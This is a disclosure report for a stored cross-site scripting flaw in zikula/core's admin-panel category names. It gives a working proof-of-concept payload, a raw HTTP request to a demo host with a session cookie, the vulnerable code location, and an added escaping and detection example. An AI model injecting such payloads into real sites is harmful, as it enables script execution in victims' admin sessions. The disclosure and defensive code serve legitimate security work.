Cross-site Scripting (XSS) - Stored in zikula/core
Reported on
Dec 30th 2021
Description
When entering a name for a module category (whether editing an existing one or adding a new one), you can inject your own JavaScript into the name, and it is executed when the category is rendered.
An example payload that you can enter is: <a href="javascript:alert(1)">xss</a>
After that, each time you click the category to expand it, your JavaScript payload is executed:
Proof of Concept
<a href="javascript:alert(1)">xss</a>
Request:
POST /adminpanel/ajax/editcategory HTTP/1.1
Host: demo.ziku.la
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 13
Origin: https://demo.ziku.la
DNT: 1
Connection: keep-alive
Referer: https://demo.ziku.la/adminpanel/panel/1
Cookie: _zsid=78cujs3anllt6em953aut59odj
Sec-GPC: 1
Impact
An attacker can exploit this vulnerability to execute their own JavaScript in the admin panel.
Occurrences
AjaxController.php L256
The item variable (line 255) stores the category object. Its name is updated from the name variable, which holds the new category name taken from the user's request (the request data for a category-name update is stored into variables at lines 210-211) without proper sanitization; the name should be sanitized before it is used at line 255.
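As an added example (not code from zikula/core or from the reporter), the following JavaScript shows the output encoding the report says is missing: the payload quoted above is HTML-escaped before it is placed into category markup, so it renders as literal text, and a small check flags any rendered entry that still carries a javascript: URL. The renderCategoryEntry markup and the containsJavascriptUrl check are assumptions made for illustration; the real admin-panel markup is not on the page.

```javascript
// Added example, not zikula/core code: escape a category name before it is
// interpolated into HTML, so markup in the name becomes inert text.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical rendering of one admin-panel category entry as an HTML string.
// escape=false reproduces the flaw described in the report (raw interpolation);
// the default escapes the name first.
function renderCategoryEntry(name, escape = true) {
  const label = escape ? escapeHtml(name) : name;
  return `<li class="category"><span class="category-name">${label}</span></li>`;
}

// Reviewer check over rendered output: does any tag carry a javascript: URL in
// an href or src attribute? True means a name reached the markup unescaped.
function containsJavascriptUrl(html) {
  return /<[^>]+\s(?:href|src)\s*=\s*["']?\s*javascript:/i.test(html);
}

// The payload quoted in the report, used here as constructed sample input.
const PAYLOAD = '<a href="javascript:alert(1)">xss</a>';

console.log('unescaped:', renderCategoryEntry(PAYLOAD, false));
console.log('escaped:  ', renderCategoryEntry(PAYLOAD));
console.log('flagged unescaped?', containsJavascriptUrl(renderCategoryEntry(PAYLOAD, false)));
console.log('flagged escaped?  ', containsJavascriptUrl(renderCategoryEntry(PAYLOAD)));
```

Escaping on output is the minimal fix for the rendering side; the report's recommendation to sanitize the name before it is stored at line 255 is complementary, since the same stored value may be rendered in more than one place.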